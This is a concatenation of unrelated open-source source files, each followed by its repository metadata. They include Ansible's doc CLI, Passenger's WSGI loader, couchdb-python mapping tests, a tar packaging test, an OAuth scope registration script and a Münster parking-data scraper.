doc['deprecated']['removed_in'] = doc['deprecated']['version']
text.append("\tReason: %(why)s\n\tWill be removed in: Ansible %(removed_in)s\n\tAlternatives: %(alternative)s" % doc.pop('deprecated'))
else:
text.append("%s" % doc.pop('deprecated'))
text.append("\n")
try:
support_block = self.get_support_block(doc)
if support_block:
text.extend(support_block)
except Exception:
            pass  # FIXME: not supported by plugins
if doc.pop('action', False):
text.append(" * note: %s\n" % "This module has a corresponding action plugin.")
if 'options' in doc and doc['options']:
text.append("OPTIONS (= is mandatory):\n")
self.add_fields(text, doc.pop('options'), limit, opt_indent)
text.append('')
if 'notes' in doc and doc['notes'] and len(doc['notes']) > 0:
text.append("NOTES:")
for note in doc['notes']:
text.append(textwrap.fill(CLI.tty_ify(note), limit - 6, initial_indent=opt_indent[:-2] + "* ", subsequent_indent=opt_indent))
text.append('')
del doc['notes']
if 'requirements' in doc and doc['requirements'] is not None and len(doc['requirements']) > 0:
req = ", ".join(doc.pop('requirements'))
text.append("REQUIREMENTS:%s\n" % textwrap.fill(CLI.tty_ify(req), limit - 16, initial_indent=" ", subsequent_indent=opt_indent))
# Generic handler
for k in sorted(doc):
if k in self.IGNORE or not doc[k]:
continue
if isinstance(doc[k], string_types):
text.append('%s: %s' % (k.upper(), textwrap.fill(CLI.tty_ify(doc[k]), limit - (len(k) + 2), subsequent_indent=opt_indent)))
elif isinstance(doc[k], (list, tuple)):
text.append('%s: %s' % (k.upper(), ', '.join(doc[k])))
else:
text.append(self._dump_yaml({k.upper(): doc[k]}, opt_indent))
del doc[k]
text.append('')
if 'plainexamples' in doc and doc['plainexamples'] is not None:
text.append("EXAMPLES:")
if isinstance(doc['plainexamples'], string_types):
text.append(doc.pop('plainexamples').strip())
else:
text.append(yaml.dump(doc.pop('plainexamples'), indent=2, default_flow_style=False))
text.append('')
if 'returndocs' in doc and doc['returndocs'] is not None:
text.append("RETURN VALUES:\n")
if isinstance(doc['returndocs'], string_types):
text.append(doc.pop('returndocs'))
else:
text.append(yaml.dump(doc.pop('returndocs'), indent=2, default_flow_style=False))
text.append('')
try:
metadata_block = self.get_metadata_block(doc)
if metadata_block:
text.extend(metadata_block)
text.append('')
except Exception:
pass # metadata is optional
return "\n".join(text)
|
trondhindenes/ansible
|
lib/ansible/cli/doc.py
|
Python
|
gpl-3.0
| 26,365
|
#!/usr/bin/env python
# Phusion Passenger - https://www.phusionpassenger.com/
# Copyright (c) 2010-2014 Phusion
#
# "Phusion Passenger" is a trademark of Hongli Lai & Ninh Bui.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import sys, os, re, imp, threading, signal, traceback, socket, select, struct, logging, errno
options = {}
def abort(message):
sys.stderr.write(message + "\n")
sys.exit(1)
def readline():
result = sys.stdin.readline()
if result == "":
raise EOFError
else:
return result
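# Read the Passenger startup handshake from stdin: acknowledge control, then
# collect "Name: value" option lines until a blank line. Illustrative exchange
# (values are made up; only generation_dir is actually used below):
#   -> "!> I have control 1.0"
#   <- "You have control 1.0"
#   <- "generation_dir: /tmp/passenger.xyz"
#   <- ""   (blank line ends the option list)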
def handshake_and_read_startup_request():
global options
print("!> I have control 1.0")
if readline() != "You have control 1.0\n":
abort("Invalid initialization header")
line = readline()
while line != "\n":
result = re.split(': *', line.strip(), 2)
name = result[0]
value = result[1]
options[name] = value
line = readline()
def load_app():
return imp.load_source('passenger_wsgi', 'passenger_wsgi.py')
def create_server_socket():
global options
filename = options['generation_dir'] + '/backends/wsgi.' + str(os.getpid())
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
os.remove(filename)
except OSError:
pass
s.bind(filename)
s.listen(1000)
return (filename, s)
def install_signal_handlers():
def debug(sig, frame):
id2name = dict([(th.ident, th.name) for th in threading.enumerate()])
code = []
for thread_id, stack in sys._current_frames().items():
code.append("\n# Thread: %s(%d)" % (id2name.get(thread_id,""), thread_id))
for filename, lineno, name, line in traceback.extract_stack(stack):
code.append(' File: "%s", line %d, in %s' % (filename, lineno, name))
if line:
code.append(" %s" % (line.strip()))
print("\n".join(code))
def debug_and_exit(sig, frame):
debug(sig, frame)
sys.exit(1)
# Unfortunately, there's no way to install a signal handler that prints
    # the backtrace without interrupting the current system call.
    # signal.siginterrupt() doesn't seem to work properly either. That is why
    # we only have a SIGABRT handler and no SIGQUIT handler.
signal.signal(signal.SIGABRT, debug_and_exit)
def advertise_sockets(socket_filename):
print("!> socket: main;unix:%s;session;1" % socket_filename)
print("!> ")
if sys.version_info[0] >= 3:
def reraise_exception(exc_info):
raise exc_info[0].with_traceback(exc_info[1], exc_info[2])
def bytes_to_str(b):
return b.decode()
def str_to_bytes(s):
return s.encode('latin-1')
else:
def reraise_exception(exc_info):
exec("raise exc_info[0], exc_info[1], exc_info[2]")
def bytes_to_str(b):
return b
def str_to_bytes(s):
return s
class RequestHandler:
def __init__(self, server_socket, owner_pipe, app):
self.server = server_socket
self.owner_pipe = owner_pipe
self.app = app
def main_loop(self):
done = False
try:
while not done:
client, address = self.accept_connection()
if not client:
done = True
break
socket_hijacked = False
try:
try:
env, input_stream = self.parse_request(client)
if env:
if env['REQUEST_METHOD'] == 'ping':
self.process_ping(env, input_stream, client)
else:
socket_hijacked = self.process_request(env, input_stream, client)
except KeyboardInterrupt:
done = True
except IOError:
e = sys.exc_info()[1]
if not getattr(e, 'passenger', False) or e.errno != errno.EPIPE:
logging.exception("WSGI application raised an I/O exception!")
except Exception:
logging.exception("WSGI application raised an exception!")
finally:
if not socket_hijacked:
try:
# Shutdown the socket like this just in case the app
# spawned a child process that keeps it open.
client.shutdown(socket.SHUT_WR)
except:
pass
try:
client.close()
except:
pass
except KeyboardInterrupt:
pass
def accept_connection(self):
result = select.select([self.owner_pipe, self.server.fileno()], [], [])[0]
if self.server.fileno() in result:
return self.server.accept()
else:
return (None, None)
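    # Wire format: a 4-byte big-endian length prefix, then that many bytes of
    # NUL-separated alternating header names and values.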
def parse_request(self, client):
buf = b''
while len(buf) < 4:
tmp = client.recv(4 - len(buf))
if len(tmp) == 0:
return (None, None)
buf += tmp
header_size = struct.unpack('>I', buf)[0]
buf = b''
while len(buf) < header_size:
tmp = client.recv(header_size - len(buf))
if len(tmp) == 0:
return (None, None)
buf += tmp
headers = buf.split(b"\0")
headers.pop() # Remove trailing "\0"
env = {}
i = 0
while i < len(headers):
env[bytes_to_str(headers[i])] = bytes_to_str(headers[i + 1])
i += 2
return (env, client)
if hasattr(socket, '_fileobject'):
def wrap_input_socket(self, sock):
return socket._fileobject(sock, 'rb', 512)
else:
def wrap_input_socket(self, sock):
return socket.socket.makefile(sock, 'rb', 512)
def process_request(self, env, input_stream, output_stream):
        # The WSGI specification says that the input object passed to the
        # application must implement a few file-like methods. That is why we
        # wrap the raw socket._socket in a _fileobject.
#
# Otherwise, the POST data won't be correctly retrieved by Django.
#
# See: http://www.python.org/dev/peps/pep-0333/#input-and-error-streams
env['wsgi.input'] = self.wrap_input_socket(input_stream)
env['wsgi.errors'] = sys.stderr
env['wsgi.version'] = (1, 0)
env['wsgi.multithread'] = False
env['wsgi.multiprocess'] = True
env['wsgi.run_once'] = False
if env.get('HTTPS','off') in ('on', '1', 'true', 'yes'):
env['wsgi.url_scheme'] = 'https'
else:
env['wsgi.url_scheme'] = 'http'
headers_set = []
headers_sent = []
def write(data):
try:
if not headers_set:
raise AssertionError("write() before start_response()")
elif not headers_sent:
# Before the first output, send the stored headers.
status, response_headers = headers_sent[:] = headers_set
output_stream.sendall(str_to_bytes('Status: %s\r\n' % status))
for header in response_headers:
output_stream.sendall(str_to_bytes('%s: %s\r\n' % header))
output_stream.sendall(b'\r\n')
output_stream.sendall(data)
except IOError:
# Mark this exception as coming from the Phusion Passenger
# socket and not some other socket.
e = sys.exc_info()[1]
setattr(e, 'passenger', True)
raise e
def start_response(status, response_headers, exc_info = None):
if exc_info:
try:
if headers_sent:
# Re-raise original exception if headers sent.
reraise_exception(exc_info)
finally:
# Avoid dangling circular ref.
exc_info = None
elif headers_set:
raise AssertionError("Headers already set!")
headers_set[:] = [status, response_headers]
return write
def hijack():
env['passenger.hijacked_socket'] = output_stream
return output_stream
env['passenger.hijack'] = hijack
result = self.app(env, start_response)
if 'passenger.hijacked_socket' in env:
# Socket connection hijacked. Don't do anything.
return True
try:
for data in result:
# Don't send headers until body appears.
if data:
write(data)
if not headers_sent:
# Send headers now if body was empty.
write(b'')
finally:
if hasattr(result, 'close'):
result.close()
return False
def process_ping(self, env, input_stream, output_stream):
output_stream.sendall(b"pong")
if __name__ == "__main__":
logging.basicConfig(
level = logging.WARNING,
format = "[ pid=%(process)d, time=%(asctime)s ]: %(message)s")
if hasattr(logging, 'captureWarnings'):
logging.captureWarnings(True)
handshake_and_read_startup_request()
app_module = load_app()
socket_filename, server_socket = create_server_socket()
install_signal_handlers()
handler = RequestHandler(server_socket, sys.stdin, app_module.application)
print("!> Ready")
advertise_sockets(socket_filename)
handler.main_loop()
|
gnoling/passenger
|
helper-scripts/wsgi-loader.py
|
Python
|
mit
| 8,988
|
from __future__ import unicode_literals
from django.test import TestCase
class HomepageViewTestCase(TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_get_method(self):
pass
def test_post_method(self):
pass
def test_dispatch(self):
pass
|
ozknightwalker/testing_101
|
base/tests/test_views.py
|
Python
|
bsd-2-clause
| 321
|
"""
Register the list of OAuth2 scopes that can be requested by third parties. This populates the Mongo collection
referenced by CAS when responding to authorization grant requests.
The database class is minimal; the exact specification for what a scope contains lives in the
python module from which this collection is drawn.
"""
import sys
import logging
from modularodm import Q
from modularodm import storage
from modularodm.exceptions import NoResultsFound
from scripts import utils as script_utils
from framework.auth import oauth_scopes
from framework.mongo import set_up_storage
from framework.transactions.context import TokuTransaction
from website.app import init_app
from website.oauth.models import ApiOAuth2Scope
logger = logging.getLogger(__name__)
def get_or_create(name, description, save=True):
"""
Populate or update the database entry, as needed
:param name:
:param description:
:return:
"""
if name != name.lower():
raise ValueError('Scope names are case-sensitive, and should always be lower-case.')
try:
scope_obj = ApiOAuth2Scope.find_one(Q('name', 'eq', name))
except NoResultsFound:
scope_obj = ApiOAuth2Scope(name=name, description=description)
print "Created new database entry for: ", name
else:
scope_obj.description = description
print "Updating existing database entry for: ", name
if save is True:
scope_obj.save()
return scope_obj
def set_backend():
"""Ensure a storage backend is set up for this model"""
set_up_storage([ApiOAuth2Scope], storage.MongoStorage)
def do_populate():
"""
:param dict scope_dict: Given a dictionary of scope definitions, {name: scope_namedtuple}, load the
resulting data into a database collection
:return:
"""
scope_dict = oauth_scopes.public_scopes
    # Clear the scope collection and repopulate it with public scopes only;
    # nothing else references these objects (CAS looks them up by name only).
ApiOAuth2Scope.remove()
for name, scope in scope_dict.iteritems():
# Update a scope if it exists, else populate
if scope.is_public is True:
get_or_create(name, scope.description, save=True)
else:
logger.info("{} is not a publicly advertised scope; did not load into database".format(name))
def main(dry=True):
init_app(set_backends=True, routes=False) # Sets the storage backends on all models
with TokuTransaction():
# Set storage backends for this model
set_backend()
do_populate()
if dry:
raise Exception('Abort Transaction - Dry Run')
if __name__ == '__main__':
dry = 'dry' in sys.argv
if not dry:
script_utils.add_file_logger(logger, __file__)
main(dry=dry)
|
doublebits/osf.io
|
scripts/register_oauth_scopes.py
|
Python
|
apache-2.0
| 2,812
|
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
#
# Copyright 2012 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tar_library_package."""
__author__ = 'sammccall@google.com (Sam McCall)'
from io import BytesIO
import os
import tarfile
import gflags as flags
from google.apputils import basetest
from googleapis.codegen.filesys import tar_library_package
FLAGS = flags.FLAGS
class TarLibraryPackageTest(basetest.TestCase):
_FILE_NAME = 'a_test'
_DISALLOWED_FILE_NAME = 'unicode_☃☄'
_FILE_CONTENTS = u'this is a test - ☃☄'
_TEST_DATA_DIR = os.path.join(os.path.dirname(__file__), 'testdata')
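  # Member names must be ASCII (non-ASCII names raise UnicodeError); file
  # contents are stored UTF-8 encoded.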
def setUp(self):
self._output_stream = BytesIO()
self._package = tar_library_package.TarLibraryPackage(
self._output_stream)
def tearDown(self):
pass
def testAsciiFilenames(self):
self.assertRaises(UnicodeError, self._package.StartFile,
self._DISALLOWED_FILE_NAME)
def testBasicWriteFile(self):
stream = self._package.StartFile(self._FILE_NAME)
stream.write(self._FILE_CONTENTS)
self._package.EndFile()
self._package.DoneWritingArchive()
# read it back and verify
archive = tarfile.open(fileobj=BytesIO(self._output_stream.getvalue()),
mode='r:gz')
info_list = archive.getmembers()
self.assertEquals(1, len(info_list))
self.assertEquals(self._FILE_NAME, info_list[0].name)
self.assertEquals(len(self._FILE_CONTENTS.encode('utf-8')),
info_list[0].size)
def testBasicWriteFileUncompressed(self):
output_stream = BytesIO()
package = tar_library_package.TarLibraryPackage(
output_stream, compress=False)
stream = package.StartFile(self._FILE_NAME)
stream.write(self._FILE_CONTENTS)
package.EndFile()
package.DoneWritingArchive()
# read it back and verify
archive = tarfile.open(fileobj=BytesIO(output_stream.getvalue()), mode='r')
info_list = archive.getmembers()
self.assertEquals(1, len(info_list))
self.assertEquals(self._FILE_NAME, info_list[0].name)
self.assertEquals(len(self._FILE_CONTENTS.encode('utf-8')),
info_list[0].size)
def testStartAutomaticallyClosesPreviousFile(self):
stream = self._package.StartFile(self._FILE_NAME)
stream.write(self._FILE_CONTENTS)
file_name_2 = '%s_2' % self._FILE_NAME
stream = self._package.StartFile(file_name_2)
stream.write(self._FILE_CONTENTS)
self._package.EndFile()
self._package.DoneWritingArchive()
# read it back and verify
archive = tarfile.open(fileobj=BytesIO(self._output_stream.getvalue()),
mode='r:gz')
info_list = archive.getmembers()
self.assertEquals(2, len(info_list))
self.assertEquals(self._FILE_NAME, info_list[0].name)
self.assertEquals(file_name_2, info_list[1].name)
def testDoneAutomaticallyEndsFile(self):
stream = self._package.StartFile(self._FILE_NAME)
stream.write(self._FILE_CONTENTS)
self._package.DoneWritingArchive()
# read it back and verify
archive = tarfile.open(fileobj=BytesIO(self._output_stream.getvalue()),
mode='r:gz')
info_list = archive.getmembers()
self.assertEquals(1, len(info_list))
self.assertEquals(self._FILE_NAME, info_list[0].name)
def testIncludeFile(self):
made_up_dir = 'new_directory/'
made_up_path = '%sfile1.txt' % made_up_dir
# testdata/file1.txt is 125 bytes long.
expected_size = 125
self._package.IncludeFile(os.path.join(self._TEST_DATA_DIR, 'file1.txt'),
made_up_path)
self._package.DoneWritingArchive()
# read it back and verify
archive = tarfile.open(fileobj=BytesIO(self._output_stream.getvalue()),
mode='r:gz')
info_list = archive.getmembers()
self.assertEquals(1, len(info_list)) # no explicit folders
self.assertEquals(made_up_path, info_list[0].name)
self.assertEquals(expected_size, info_list[0].size)
def testManyFiles(self):
top_of_tree = os.path.join(self._TEST_DATA_DIR, 'tree/')
total_files_in_testdata_tree = 3 # determined by hand
paths = []
for root, unused_dirs, file_names in os.walk(top_of_tree):
for file_name in file_names:
paths.append(os.path.join(root, file_name))
self._package.IncludeManyFiles(paths, top_of_tree)
self._package.DoneWritingArchive()
# check it
archive = tarfile.open(fileobj=BytesIO(self._output_stream.getvalue()),
mode='r:gz')
info_list = archive.getmembers()
self.assertEquals(total_files_in_testdata_tree, len(info_list))
def testManyFilesError(self):
files = [os.path.join(self._TEST_DATA_DIR, file_name)
for file_name in ['tree/abc', 'tree/def', 'file1.txt']]
self.assertRaises(ValueError,
self._package.IncludeManyFiles,
files,
os.path.join(self._TEST_DATA_DIR, 'tree/'))
def testFileProperties(self):
self.assertEquals('tgz', self._package.FileExtension())
self.assertEquals('application/x-gtar-compressed', self._package.MimeType())
uncompressed = tar_library_package.TarLibraryPackage(
BytesIO(), compress=False)
self.assertEquals('tar', uncompressed.FileExtension())
self.assertEquals('application/x-gtar', uncompressed.MimeType())
if __name__ == '__main__':
basetest.main()
|
google/apis-client-generator
|
src/googleapis/codegen/filesys/tar_library_package_test.py
|
Python
|
apache-2.0
| 5,992
|
###########################################################
#
# Copyright (c) 2005, Southpaw Technology
# All Rights Reserved
#
# PROPRIETARY INFORMATION. This software is proprietary to
# Southpaw Technology, and is not to be reproduced, transmitted,
# or disclosed in any way without written permission.
#
#
#
from sql import *
from sql_dumper import *
from database_impl import *
from transaction import *
from transaction_log import *
from transaction_state import *
from exception_log import *
from search import *
from sobject_mapping import *
from sobject_config import *
from db_introspect import *
from sobject_log import *
from widget_db_config import *
from sobject_default_config import *
|
sadanandb/pmt
|
src/pyasm/search/__init__.py
|
Python
|
epl-1.0
| 730
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2007-2009 Christopher Lenz
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
from decimal import Decimal
import doctest
import unittest
from couchdb import design, mapping
from couchdb.tests import testutil
class DocumentTestCase(testutil.TempDatabaseMixin, unittest.TestCase):
def test_mutable_fields(self):
class Test(mapping.Document):
d = mapping.DictField()
a = Test()
b = Test()
a.d['x'] = True
self.assertTrue(a.d.get('x'))
self.assertFalse(b.d.get('x'))
def test_automatic_id(self):
class Post(mapping.Document):
title = mapping.TextField()
post = Post(title='Foo bar')
assert post.id is None
post.store(self.db)
assert post.id is not None
self.assertEqual('Foo bar', self.db[post.id]['title'])
def test_explicit_id_via_init(self):
class Post(mapping.Document):
title = mapping.TextField()
post = Post(id='foo_bar', title='Foo bar')
self.assertEqual('foo_bar', post.id)
post.store(self.db)
self.assertEqual('Foo bar', self.db['foo_bar']['title'])
def test_explicit_id_via_setter(self):
class Post(mapping.Document):
title = mapping.TextField()
post = Post(title='Foo bar')
post.id = 'foo_bar'
self.assertEqual('foo_bar', post.id)
post.store(self.db)
self.assertEqual('Foo bar', self.db['foo_bar']['title'])
def test_change_id_failure(self):
class Post(mapping.Document):
title = mapping.TextField()
post = Post(title='Foo bar')
post.store(self.db)
post = Post.load(self.db, post.id)
try:
post.id = 'foo_bar'
            self.fail('Expected AttributeError')
except AttributeError, e:
self.assertEqual('id can only be set on new documents', e.args[0])
def test_batch_update(self):
class Post(mapping.Document):
title = mapping.TextField()
post1 = Post(title='Foo bar')
post2 = Post(title='Foo baz')
results = self.db.update([post1, post2])
self.assertEqual(2, len(results))
assert results[0][0] is True
assert results[1][0] is True
def test_store_existing(self):
class Post(mapping.Document):
title = mapping.TextField()
post = Post(title='Foo bar')
post.store(self.db)
post.store(self.db)
self.assertEqual(len(list(self.db.view('_all_docs'))), 1)
def test_old_datetime(self):
dt = mapping.DateTimeField()
assert dt._to_python(u'1880-01-01T00:00:00Z')
def test_get_has_default(self):
doc = mapping.Document()
doc.get('foo')
doc.get('foo', None)
class ListFieldTestCase(testutil.TempDatabaseMixin, unittest.TestCase):
def test_to_json(self):
# See <http://code.google.com/p/couchdb-python/issues/detail?id=14>
class Post(mapping.Document):
title = mapping.TextField()
comments = mapping.ListField(mapping.DictField(
mapping.Mapping.build(
author = mapping.TextField(),
content = mapping.TextField(),
)
))
post = Post(title='Foo bar')
post.comments.append(author='myself', content='Bla bla')
post.comments = post.comments
self.assertEqual([{'content': 'Bla bla', 'author': 'myself'}],
post.comments)
def test_proxy_append(self):
class Thing(mapping.Document):
numbers = mapping.ListField(mapping.DecimalField)
thing = Thing(numbers=[Decimal('1.0'), Decimal('2.0')])
thing.numbers.append(Decimal('3.0'))
self.assertEqual(3, len(thing.numbers))
self.assertEqual(Decimal('3.0'), thing.numbers[2])
def test_proxy_append_kwargs(self):
class Thing(mapping.Document):
numbers = mapping.ListField(mapping.DecimalField)
thing = Thing()
self.assertRaises(TypeError, thing.numbers.append, foo='bar')
def test_proxy_contains(self):
class Thing(mapping.Document):
numbers = mapping.ListField(mapping.DecimalField)
thing = Thing(numbers=[Decimal('1.0'), Decimal('2.0')])
assert isinstance(thing.numbers, mapping.ListField.Proxy)
assert '1.0' not in thing.numbers
assert Decimal('1.0') in thing.numbers
def test_proxy_count(self):
class Thing(mapping.Document):
numbers = mapping.ListField(mapping.DecimalField)
thing = Thing(numbers=[Decimal('1.0'), Decimal('2.0')])
self.assertEqual(1, thing.numbers.count(Decimal('1.0')))
self.assertEqual(0, thing.numbers.count('1.0'))
def test_proxy_index(self):
class Thing(mapping.Document):
numbers = mapping.ListField(mapping.DecimalField)
thing = Thing(numbers=[Decimal('1.0'), Decimal('2.0')])
self.assertEqual(0, thing.numbers.index(Decimal('1.0')))
self.assertRaises(ValueError, thing.numbers.index, '3.0')
def test_proxy_insert(self):
class Thing(mapping.Document):
numbers = mapping.ListField(mapping.DecimalField)
thing = Thing(numbers=[Decimal('1.0'), Decimal('2.0')])
thing.numbers.insert(0, Decimal('0.0'))
self.assertEqual(3, len(thing.numbers))
self.assertEqual(Decimal('0.0'), thing.numbers[0])
def test_proxy_insert_kwargs(self):
class Thing(mapping.Document):
numbers = mapping.ListField(mapping.DecimalField)
thing = Thing()
self.assertRaises(TypeError, thing.numbers.insert, 0, foo='bar')
def test_proxy_remove(self):
class Thing(mapping.Document):
numbers = mapping.ListField(mapping.DecimalField)
thing = Thing()
thing.numbers.append(Decimal('1.0'))
thing.numbers.remove(Decimal('1.0'))
def test_proxy_iter(self):
class Thing(mapping.Document):
numbers = mapping.ListField(mapping.DecimalField)
self.db['test'] = {'numbers': ['1.0', '2.0']}
thing = Thing.load(self.db, 'test')
assert isinstance(thing.numbers[0], Decimal)
def test_proxy_iter_dict(self):
class Post(mapping.Document):
comments = mapping.ListField(mapping.DictField)
self.db['test'] = {'comments': [{'author': 'Joe', 'content': 'Hey'}]}
post = Post.load(self.db, 'test')
assert isinstance(post.comments[0], dict)
def test_proxy_pop(self):
class Thing(mapping.Document):
numbers = mapping.ListField(mapping.DecimalField)
thing = Thing()
thing.numbers = [Decimal('%d' % i) for i in range(3)]
self.assertEqual(thing.numbers.pop(), Decimal('2.0'))
self.assertEqual(len(thing.numbers), 2)
self.assertEqual(thing.numbers.pop(0), Decimal('0.0'))
def test_proxy_slices(self):
class Thing(mapping.Document):
numbers = mapping.ListField(mapping.DecimalField)
thing = Thing()
thing.numbers = [Decimal('%d' % i) for i in range(5)]
ll = thing.numbers[1:3]
self.assertEqual(len(ll), 2)
self.assertEqual(ll[0], Decimal('1.0'))
thing.numbers[2:4] = [Decimal('%d' % i) for i in range(6, 8)]
self.assertEqual(thing.numbers[2], Decimal('6.0'))
self.assertEqual(thing.numbers[4], Decimal('4.0'))
self.assertEqual(len(thing.numbers), 5)
del thing.numbers[3:]
self.assertEquals(len(thing.numbers), 3)
def test_mutable_fields(self):
class Thing(mapping.Document):
numbers = mapping.ListField(mapping.DecimalField)
thing = Thing.wrap({'_id': 'foo', '_rev': 1}) # no numbers
thing.numbers.append('1.0')
thing2 = Thing(id='thing2')
self.assertEqual([i for i in thing2.numbers], [])
class DocumentSchemaFieldTestCase(testutil.TempDatabaseMixin, unittest.TestCase):
def test_simple(self):
class OtherThing(mapping.DocumentSchema):
text = mapping.TextField()
class Thing(mapping.Document):
other = OtherThing()
thing = Thing.wrap({"_id": 42, "_rev": 1, "other":{"text": "something"}})
self.assertEqual(thing.other.text, "something")
thing = Thing()
thing.other = OtherThing()
thing.other.text = "something"
self.assertEqual(thing.unwrap(), {"other":{"text": "something"}})
def test_list(self):
class OtherThing(mapping.DocumentSchema):
text = mapping.TextField()
class Thing(mapping.Document):
other = mapping.ListField(OtherThing())
thing = Thing.wrap({"_id": 42, "_rev": 1,
"other":[{"text": "something"}, {"text": "other thing"}]})
self.assertEqual(thing.other[0].text, "something")
self.assertEqual(thing.other[1].text, "other thing")
thing = Thing()
thing.other.append(OtherThing(text="one"))
thing.other.append(OtherThing(text="two"))
self.assertEqual(thing.unwrap(),
{"other":[{"text": "one"}, {"text": "two"}]})
def test_dict(self):
class OtherThing(mapping.DocumentSchema):
text = mapping.TextField()
class Thing(mapping.Document):
other = mapping.DictField(schema=OtherThing())
thing = Thing.wrap({"_id": 42, "_rev": 1,
"other": {
"a": {"text": "something"},
"b": {"text": "other thing"}
}
})
self.assertEqual(thing.other["a"]["text"], "something")
self.assertEqual(thing.other["b"]["text"], "other thing")
thing = Thing()
thing.other["a"] = OtherThing(text="one")
thing.other["b"] = OtherThing(text="two")
self.assertEqual(thing.unwrap(), {"other":
{"a": {"text": "one"}, "b": {"text": "two"}}})
all_map_func = 'function(doc) { emit(doc._id, doc); }'
class WrappingTestCase(testutil.TempDatabaseMixin, unittest.TestCase):
class Item(mapping.Document):
with_include_docs = mapping.ViewField('test', all_map_func,
include_docs=True)
without_include_docs = mapping.ViewField('test', all_map_func)
def setUp(self):
super(WrappingTestCase, self).setUp()
design.ViewDefinition.sync_many(
self.db, [self.Item.with_include_docs,
self.Item.without_include_docs])
def test_viewfield_property(self):
self.Item().store(self.db)
results = self.Item.with_include_docs(self.db)
self.assertEquals(type(results.rows[0]), self.Item)
results = self.Item.without_include_docs(self.db)
self.assertEquals(type(results.rows[0]), self.Item)
def test_view(self):
self.Item().store(self.db)
results = self.Item.view(self.db, 'test/without_include_docs')
self.assertEquals(type(results.rows[0]), self.Item)
results = self.Item.view(self.db, 'test/without_include_docs',
include_docs=True)
self.assertEquals(type(results.rows[0]), self.Item)
def test_query(self):
self.Item().store(self.db)
results = self.Item.query(self.db, all_map_func, None)
self.assertEquals(type(results.rows[0]), self.Item)
results = self.Item.query(self.db, all_map_func, None, include_docs=True)
self.assertEquals(type(results.rows[0]), self.Item)
def suite():
suite = unittest.TestSuite()
suite.addTest(doctest.DocTestSuite(mapping))
suite.addTest(unittest.makeSuite(DocumentTestCase, 'test'))
suite.addTest(unittest.makeSuite(ListFieldTestCase, 'test'))
suite.addTest(unittest.makeSuite(DocumentSchemaFieldTestCase, 'test'))
suite.addTest(unittest.makeSuite(WrappingTestCase, 'test'))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
Roger/couchdb-python
|
couchdb/tests/mapping.py
|
Python
|
bsd-3-clause
| 12,137
|
from bs4 import BeautifulSoup
from park_api.util import convert_date
from park_api.geodata import GeoData
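# German status labels mapped to ParkAPI states: "frei" = free, "geschlossen"
# = closed; "besetzt" (occupied/full) presumably still counts as "open" since
# the lot is operating.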
state_map = {
"frei": "open",
"geschlossen": "closed",
"besetzt": "open"
}
geodata = GeoData(__file__)
def parse_html(html):
soup = BeautifulSoup(html, "html.parser")
lot_table_trs = soup.select("div#parkingList table")[0].find_all("tr")
date_field = soup.find(id="lastRefresh").text.strip()
data = {
"last_updated": convert_date(date_field, "%d.%m.%Y %H:%M Uhr"),
"lots": []
}
    for tr in lot_table_trs[1:-1]:
        tds = tr.find_all("td")
        raw_name = tds[0].text.strip()
        type_and_name = process_name(raw_name)
        lot = geodata.lot(raw_name)
data["lots"].append({
"name": type_and_name[1].strip("\n"),
"lot_type": type_and_name[0],
"free": int(tds[1].text),
"total": lot.total,
"state": state_map.get(tds[2].text, ""),
"coords": lot.coords,
"id": lot.id,
"forecast": False
})
return data
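# Split the raw lot label into (lot_type, name): a "PP" prefix means Parkplatz
# (surface lot), "PH" means Parkhaus (parking garage); anything else is left
# untyped and the full label is kept as the name.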
def process_name(name):
lot_type = name[:3].strip()
lot_name = name[3:].strip()
type_mapping = {
"PP": "Parkplatz",
"PH": "Parkhaus",
}
if lot_type in type_mapping.keys():
lot_type = type_mapping[lot_type]
else:
lot_type = ""
lot_name = name
return lot_type, lot_name
|
offenesdresden/ParkAPI
|
park_api/cities/Muenster.py
|
Python
|
mit
| 1,414
|
#!/usr/bin/env python
#
# Bootloader for the Swift Navigation Piksi GPS Receiver
#
# Copyright (C) 2010 Gareth McMullin <gareth@blacksphere.co.nz>
# Copyright (C) 2011 Piotr Esden-Tempski <piotr@esden.net>
# Copyright (C) 2013-2014 Swift Navigation Inc <www.swift-nav.com>
#
# Contacts: Colin Beighley <colin@swift-nav.com>
# Fergus Noble <fergus@swift-nav.com>
#
# Based on luftboot, a bootloader for the Paparazzi UAV project.
#
# This source is subject to the license found in the file 'LICENSE' which must
# be be distributed together with this source. All other rights reserved.
#
# THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND,
# EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A PARTICULAR PURPOSE.
"""
The :mod:`piksi_tools.bootload` module contains functions loading firmware
images.
"""
from __future__ import absolute_import, print_function
import random
import sys
import threading
from sbp.client import Framer, Handler
